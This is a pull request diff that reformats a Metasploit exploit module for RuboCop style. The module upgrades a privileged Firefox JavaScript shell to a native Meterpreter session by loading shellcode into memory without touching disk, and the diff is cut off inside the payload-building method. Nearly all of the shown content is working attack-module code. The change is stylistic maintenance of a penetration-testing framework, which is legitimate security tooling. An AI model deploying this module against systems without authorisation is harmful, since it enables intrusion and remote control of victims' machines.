### PR TITLE
modules/exploits/firefox: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/firefox/local/exec_shellcode.rb
+++ b/modules/exploits/firefox/local/exec_shellcode.rb
@@ -3,51 +3,58 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking # Missing autodetection, but has widespread targetability
 
   include Msf::Payload::Firefox
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'          => 'Firefox Exec Shellcode from Privileged Javascript Shell',
-      'Description'   => %q{
-        This module allows execution of native payloads from a privileged Firefox Javascript shell.
-        It places the specified payload into memory, adds the necessary protection flags,
-        and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
-        session without touching the disk.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'joev' ],
-      'Platform'      => [ 'firefox' ],
-      'DisclosureDate' => '2014-03-10',
-      'Targets'       => [
-        [
-          'Native Payload', {
-            'Platform' => %w{ linux osx win unix },
-            'Arch'     => ARCH_ALL
-          }
-        ]
-      ],
-      'DefaultTarget' => 0
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Firefox Exec Shellcode from Privileged Javascript Shell',
+        'Description' => %q{
+          This module allows execution of native payloads from a privileged Firefox Javascript shell.
+          It places the specified payload into memory, adds the necessary protection flags,
+          and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
+          session without touching the disk.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'joev' ],
+        'Platform' => [ 'firefox' ],
+        'DisclosureDate' => '2014-03-10',
+        'Targets' => [
+          [
+            'Native Payload', {
+              'Platform' => %w[linux osx win unix],
+              'Arch' => ARCH_ALL
+            }
+          ]
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options([
-      OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
+      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
     ])
   end
 
   def exploit
-    print_status "Running the Javascript shell..."
+    print_status('Running the JavaScript shell...')
     session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
-    results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
+    results = session.shell_read_until_token('[!JAVASCRIPT]', 0, datastore['TIMEOUT'])
     print_warning(results) if results.present?
   end
 
   def js_payload
-    %Q|
+    %|
       (function(send){
         try {
           #{run_payload}


### PR DESCRIPTION
All violations were resolved with `rubocop -a`, except missing notes.
